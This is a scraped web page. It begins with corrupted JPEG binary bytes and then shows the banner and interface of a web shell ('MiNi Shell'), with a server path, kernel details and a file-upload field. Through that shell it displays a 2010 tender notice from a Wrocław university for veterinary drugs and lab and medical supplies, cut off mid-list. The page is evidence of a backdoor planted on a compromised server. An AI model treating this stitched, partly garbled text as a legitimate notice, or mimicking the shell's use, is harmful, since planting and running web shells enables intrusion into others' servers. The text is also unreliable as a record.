JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100528/138693-N-2010.html

<p class="kh_header"><b>Wrocław: Dostawa materiałów i surowców medycznych zaplanowanych w pozycji materiałów i surowców niezbędnych do realizacji projektu pt. Innowacyjne technologie produkcji biopreparatów na bazie nowej generacji jaj (OVOCURA) o numerze POIG 01.03.01-00-133/08 realizowanego w ramach Programu Operacyjnego Innowacyjnego Gospodarka 2007-2013 współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego.RAP 7 2010</b><br>
<b>Numer ogłoszenia: 138693 - 2010; data zamieszczenia: 28.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Przyrodniczy we Wrocławiu , ul. C.K. Norwida 25/27, 50-375 Wrocław, woj. dolnośląskie, tel. 071 3283576, 3205496, faks 071 3283576.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.up.wroc.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> zamawiający nie przewiduje ustanowienia DSZ</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów i surowców medycznych zaplanowanych w pozycji materiałów i surowców niezbędnych do realizacji projektu pt. Innowacyjne technologie produkcji biopreparatów na bazie nowej generacji jaj (OVOCURA) o numerze POIG 01.03.01-00-133/08 realizowanego w ramach Programu Operacyjnego Innowacyjnego Gospodarka 2007-2013 współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego.RAP 7 2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa materiałów i surowców medycznych zaplanowanych w pozycji materiałów i surowców niezbędnych do realizacji projektu pt. Innowacyjne technologie produkcji biopreparatów na bazie nowej generacji jaj (OVOCURA) o numerze POIG 01.03.01-00-133 08 realizowanego w ramach Programu Operacyjnego Innowacyjnego Gospodarka 2007-2013 współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego.
Szczegółowy zakres i ilośc zamawianego asortymentu określono w załącznikach do ogłoszenia dotyczących poszczególnych części. Poniżej 193 000 E.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.69.00.00-3, 33.14.00.00-3, 33.19.00.00-8, 33.69.63.00-8, 33.65.15.20-9, 38.43.70.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu nie wymaga się wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w odniesieniu do częsci I postępowania Wykonawca musi posiadać zezwolenie na  prowadzenie działalności w zakresie obrotu produktami leczniczymi weterynaryjnymi, w tym zawierającymi w swoim składzie substancje psychotropowe.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie ustanawia szczegółowych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie ustanawia szczegółowych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie ustanawia szczegółowych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie ustanawia szczegółowych warunków w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 ustawy, Zamawiający dopuszcza wprowadzenie istotnych zmian do umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy oraz określa warunki tych zmian poprzez dopuszczenie możliwości zmian umowy w formie pisemnego aneksu dotyczącego w szczególności:
I)  zmian terminu wykonania dostaw: 
a) z przyczyn obiektywnych nie leżących po stronie Wykonawcy,
b) z przyczyn leżących po stronie Zamawiającego;
c) z powodu wystąpienia siły wyższej.
II)  zmian osób reprezentujących Wykonawcę i Zamawiającego z przyczyn losowych
III) zmian przepisów prawa podatkowego w tym zmiany stawki VAT
IV) warunki dokonywania zmian: 
-inicjowanie zmian na wniosek wykonawcy lub zamawiającego, 
- uzasadnienie zmiany prawidłową realizacją przedmiotu umowy,
- forma pisemna pod rygorem nieważności w formie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.up.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych i Umów Uniwersytetu Przyrodniczego we Wrocławiu
ul. Mikulicza-Radeckiego 6, 50-345 Wrocław, pok.114.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.06.2010 godzina 10:00, miejsce: Uniwersytet Przyrodniczy we Wrocławiu
50-345 Wrocław,ul. Mikulicza-Radeckiego 6
pok.102.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotem zamówienia jest dostawa materiałów i surowców niezbędnych do realizacji projektu pt. Innowacyjne technologie produkcji biopreparatów na bazie nowej generacji jaj OVOCURA o numerze POIG 01.03.01 00 133 08 realizowanego 
w ramach Programu Operacyjnego Innowacyjnego Gospodarka 2007 2013 współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego.
Ponadto zamawiający informuje, że Zamawiający dopuszcza składanie ofert częściowych. Wykonawca może przystąpić do niniejszego postępowania składając ofertę na jedno, dwa, trzy, cztery, pięć, sześć, siedem lub wszystkie zadania - części. 
Wykonawca zgodnie z art. 38 ust. 1 ustawy PZP może zwrócić się do zamawiającego o wyjaśnienie treści specyfikacji istotnych warunków zamówienia. Zamawiający jest obowiązany udzielić wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu składania ofert pod warunkiem, że wniosek o wyjaśnienie treści specyfikacji istotnych warunków zamówienia wpłynął do zamawiającego nie później niż do końca dnia, w którym upływa połowa wyznaczonego terminu składania ofert tj. do 02.06.2010 r. 
Jeżeli wniosek o wyjaśnienie treści specyfikacji istotnych warunków zamówienia wpłynął po upływie terminu składania wniosku, o którym mowa powyżej, lub dotyczy udzielonych wyjaśnień, zamawiający może udzielić wyjaśnień albo pozostawić wniosek bez rozpoznania. Przedłużenie terminu składania ofert nie wpływa na bieg terminu składania wniosku, o którym mowa powyżej. 
Pytanie należy skierować na piśmie na adres: Biuro Zamówień Publicznych i Umów Uniwersytetu Przyrodniczego we Wrocławiu, ul. Mikulicza-Radeckego 6, 50-345 Wrocław z dopiskiem: Dostawa materiałów i surowców medycznych, Część     , RAP 7 2010 lub faxem na numer: 071 320 53 86. 
Zamawiający przekaże Wykonawcy faxem odpowiedzi na zadane przez niego pytania, nie ujawniając ich źródła oraz zamieści je na stronie internetowej: www.up.wroc.pl zakładka: przetargi. Wykonawcy mają obowiązek stałego śledzenia ww. strony internetowej Zamawiającego.
W uzasadnionych przypadkach Zamawiający może przed upływem terminu składania ofert zmienić treść s.i.w.z. Dokonana zmiana zostanie umieszczona na stronie internetowej zamawiającego www.up.wroc.pl zakładka: przetargi i jest wiążąca dla Wykonawców. BZPiU jest czynne od poniedziałku do piątku od 7:30-15.30.
W przypadku, gdy Wykonawca otrzymał s.i.w.z. w wersji papierowej, odpowiedzi na pytania oraz wszelkie informacje dotyczące zmiany treści s.i.w.z. zostaną mu przesłane faxem i pocztą. Zamawiający dopuszcza składanie ofert równoważnych. Szczegółowy opis parametrów produktów równoważnych przedstawiono w SIWZ..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa produktów leczniczych weterynaryjnych 
i produktów leczniczych dla zwierząt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa towaru	 	                          Ilość
		
Bovilis lactovac C 25 ml 5 dawek		6 opak,
Kolibin RC Neo 10 ml 5 dawek		16opak,
Rotavec Corona  10 ml 5 dawek		16opak,
Trivacton 6 - 10 dawek		             3 opak,
Agroskin CT 200 		                          1szt,
Alu Spray 200ml		                          7 opak,
Antisedan 5mg/10 ml		             1opak,
Bioketan fl 20 ml		                          50 opak,
Cepetor flakon 10 ml		              3 opak,
Domitor 1mg/ml op. = 10 ml		              1opak,
Fatroximin topic spray 170g		              3 opak,
opaska elast samoprzylepna 10 cm		 10 szt,
Shotapen fl. 250 ml		              1opak,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.00.00-3, 33.14.00.00-3, 33.19.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> dostawa produktów medycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> nazwa towaru	 	                                                            Ilość
			
1.Zestaw do oznaczania aktywności bójczej (wybuch tlenowy) 
neutrofilów i makrofagów krwi obwodowej metodą cytometrii 
przepływowej                                                                                2 zestawy
2 Zestaw do oznaczania aktywności fagocytarnej neutrofilów i makrofagów krwi metodą cytometrii przepływowej		                                  2 zestawy
3Płyn Hanksa  do hodowli komórkowych, opakowanie po 500 ml	        20 butelek
4Płyn PBS - zbuforowany roztwór soli fizjologicznej, 
opakowanie po 500 ml                                                                     50 butelek
5.Płyn RPMI-1640-płyn do hodowli komórkowej, opakowanie po 500 ml     10 butelek
6.Urografina 76% opakowanie -butelka po 20ml		                     40 butelek
7.Albumina bydlęca  frakcja V w proszku                                             200 g
8.Albumina bydlęca w substancji  		                                   500 g
9.Dopełniacz liofilizowany świnki morskiej, fiolka po 2 ml		        15 fiolek
10.Lignina 5 kg		                                                            13 sztuk
11.Lipopolisacharyd z E.Coli (O55:B5)  w 1 ampułce = 10 ?g	         2 ampułki
12.Manusan płyn do dezynfekcji po  0,5 l		                     20 sztuk
13.Midanium  w opakowaniu 5 amp. po 10 ml każda		      6 opakowań
14.Roztwór stabilizowany peniciliny i streptomycyny do hodowli komórkowych, 
1 ampułka po 10 ml		                                                         5 ampułek
15.Propofol amp 20 ml w opakowaniu po 5 amp		                  5 opakowań
16.Tris Buffered Saline with Tween 20, ph 8,0 (TBS) proszek (w 1 opakowaniu=10szt.)		                                          1 opakowanie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.00.00-3, 33.14.00.00-3, 33.19.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> dostawa produktów leczniczych - drobny sprzęt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Kapilary do hematokrytu z heparyną Na, w pudełku kartonowym 		100 sztuk
2	Korki uniwersalne do probówek rozporowe z PE 11-13 mm czerwone		500 sztuk
3	Korki uniwersalne do probówek rozporowe z PE 11-13 mm niebieskie		500 sztuk
4	Korki uniwersalne do probówek rozporowe z PE 11-13 mm żółte		500 sztuk
5	Korki uniwersalne do probówek rozporowe z PE 15-17 mm czerwone		500 sztuk
6	Naczynka do aparatu COBAS  0,7 ml  białe z korkiem 	3000 sztuk
7	Płytki titracyjne 96 dołkowe, sterylne typu U 		4 sztuki
8	Probówki okrągłodenne z PS 16x10 bez kołnierza  	500 sztuk
9	Probówki okrągłodenne z PS 3 ml (12x55) bez kołnierza 	1000 sztuk
10	Szkielka podstawowe  25 /75 mm, gr 1 mm, białe szkło	3000 sztuk
11	Barbital- sól sodowa kwasu barbiturowego 		1 kg
12	Dozownik strzykawkowy na 48 jednakowych dawek 	1 sztuka
13	Kompres niejałowy 10x10 cm 100 szt w opakowaniu	2 opakownia
14	Kompres niejałowy 7,5 x 7,5 cm 100 szt w opakowaniu	5 opakowań
15	Kompresy gazowe jałowe  7,5 x 7,5 cm, 		30 sztuk
16	Membrany polieterosulfon (PES)   NMWL 1 kDA 
             (punkt odcięcia) o średnicy 63,5 mm		              20 sztuk
17	Penseta anatomiczna  11 cm		                           10 sztuk
18	Pochłaniacz CO2 z indykatorem granulat 
             (wapno sodowane) - 5 l		                          1 sztuka
19	Probówki typu  Microvette o poj. 500 ul powlekane heparyną litową 
             z okrągłym dnem w probówce 		             300 sztuk
20	Probówki typu Microvette o pojemności 500 ul 
             powlekane EDTA, z okrągłym dnem w probówce 	300 sztuk
21	Probówki pojedyncze do PCR - 0,2 ml z płaskim zamknięciem 1000 sztuk
22	Pudełka do przechowywania po 100 próbek w niskich temp. 
             z poliwęglanu z przezroczystymi pokrywkami. Otwory na probówki i         
             pokrywki oznakowane numerycznie		24 sztuki
23	Pudełka na 100 probówek Eppendorfa		10 sztuk
24	Statyw na min. 20 próbówek ependorf  2,0 ml 	3 sztuki
25	Stetoskop weterynaryjny dla bydła o wysokiej jakości wysłuchu		                                                                2 sztuki
26	Strzykawki do dozownika MIniLab 201 z HTL 2,5 ml  200 sztuk
27	Szkiełka nakrywkowe 24x24 mm		1000 sztuk
28	Szkiełka podstawowe 76x26 mm, grubość 1-1,2 mm	1000 sztuk
29	Probówka podciśnieniowa do pobierania krwi od bydła,  	1375 sztuk
30	Zestaw do kaniulacji żył głęb. metodą Seldingera jednoświatłowy 20G dł.   
             min. 13 cm kontrastujący w RTG, prowadnik metalowy, rozszerzadło 
             10 kompletów
31	Zestaw infuzyjny do wlewów dożylnych		24 komplety.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> dostawa materiału  medycznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Igła inj. typ luer  0,9x40 (w opakowaniu 100 szt.)		18 opakowań
2.Igła inj. typ luer . 0,6x40  (w opakowaniu 100 szt.)		10 opakowań
3.Igła inj. typ luer 0,7 x 40 (w opakowaniu 100 szt.)		10 opakowań
4.Igła inj. typ luer 1,1 (opakowanie 100 szt.)		             4 opakowania
5.Igły do inj. 0,45x16 (opakowanie  100 szt.)		             10 opakowań
6.Igły do inj. 0,6x40 (w opakowaniu 100 szt.)		             10 opakowań
7.Igły do inj. 0,8x40 (opakowanie 100 szt.)		             10 opakowań
8.Igły do inj. 0,9x40 (w opakowaniu 100 szt.)		             10 opakowań
9. Igły inj. 0,7 x 40 (w opakowaniu 100 szt.)		             10 opakowań
10.Igły inj. 0,8 x 40 (w opakowaniu 100 szt.)		             12 opkowań
11.Igły inj. 0,9 x 40 (w opakowaniu 100 szt.)		             5 opakowań
12.Igły inj. 1,2 x 40 (w opakowaniu  100 szt.)		             5 opakowań
13.Igły inj. typ luer  0,45x16 (w opakowaniu 100 szt.)		10 opakowań
14.Igły typu luer średnica 0,9 (w opakowaniu 100 szt.)		3 opakowania
15.Igły typu luer średnica 1,1 (w opakowaniu 100 szt.)		4 opakowania
16.Igły typu luer średnica 1,2 (w opakowaniu  100 szt.)		4 opakowania
17.Strzykawka 10 ml  w opakowaniu 100 szt		             2 opakowania
18.Strzykawka 2 ml  w opakowaniu 100 szt		             6 opakowań
19.Strzykawka 20ml w opakowaniu  100 szt		             2 opakowania
20.Strzykawka 5 ml  w opakowaniu  100 szt		             15 opakowań
21.Strzykawki do tuberkulinizacji 1 ml (w opakowaniu 100 szt.)	10 opakowań
22.Strzykawki typu Luer 10 ml (opakowaniu 100 szt.)		12 opakowań
23.Strzykawki typu Luer 2 ml (w opakowaniu  100 szt.)		16 opakowań
24.Strzykawki typu Luer 20 ml (w opakowaniu 100 szt.)		5 opakowań
25.Strzykawki typu Luer 5 ml (w opakowaniu 100 szt.)		25 opakowań
26.Wata opatrunkowa  po 500g		                          18 sztuk
27.Wymazówki z tworzywa dł. użytkowej 13 cm i całkowitej 15,5 cm,z wacikiem wiskozowym śr. ~5 mm, w probówce transportowej, sterylne 	100 sztuk
28.Wymazówki z tworzywa z podłożem, dł. użytk. 13 cm i całk.15,5cm,z wacikiem bawełnianym śr. ~5 mm, w probówce transportowej, sterylne 	200 sztuk
29.Braunol płyn do dezynfekcji 250 ml		                          5 sztuk
30.Elektrody samoprzylepne dla dorosłych (standard) 		250 sztuk
31.Fartuch fizelinowy jednorazowy niesterylny rozmiar L		20 sztuk
32.Fartuch fizelinowy jednorazowy sterylny rozmiar L		10 sztuk
33.Igła do inj. typ luer  0,8x40 mm (w opakowaniu=100 szt.)	27 opakowań
34.Igła inj. typ luer  1,2x40 mm (w opakowaniu 100 szt.)		11 opakowań
35.Igła inj. typ luer  1,6x40 mm (w opakowaniu 100 szt.)		1 opakowanie
36.Igła jednorazowa 0,8x40 mm (w opakowaniu 100 szt.)		5 opakowań
37.Igła jednorazowa 1,2x40 mm (w opakowaniu 100 szt.)		2 opakowania
38.Igła jednorazowa 1,6x40 mm (w opakowaniu 100 szt.)		1 opakowanie
39.Kateter dożylny z portem bocznym G-22 0,9x25 mm (niebieski) 	50 sztuk
40.Nici Amifl 1-0 (plecionka) z igłą trójkątną 1/2 koła 		24 sztuki
41.Nici Dexon 2-0 z igłą trójkątną 1/2 koła 		             24 sztuki
42.Nożyczki chirurgiczne z jednym końcem ostrym, 
odgięte, typ Cooper, dł. 165 mm		                          10 sztuk
43.	Nożyczki mikroskopowe z ostrzem prostym		2 sztuki
44.	Nożyczki mikroskopowe z ostrzem zagiętym 		2 sztuki
45.	Obuwie medyczne białe		                          5 par
46.	Ostrza jednorazowe do skalpela nr 24, 
             100 sztuk w opakowaniu                                            1 opakowanie
47.Papier fotograficzny do drukarki UPP Sony 110 mm szerokości, 
     długość równa lub większa 20 m		                        10 opakowań
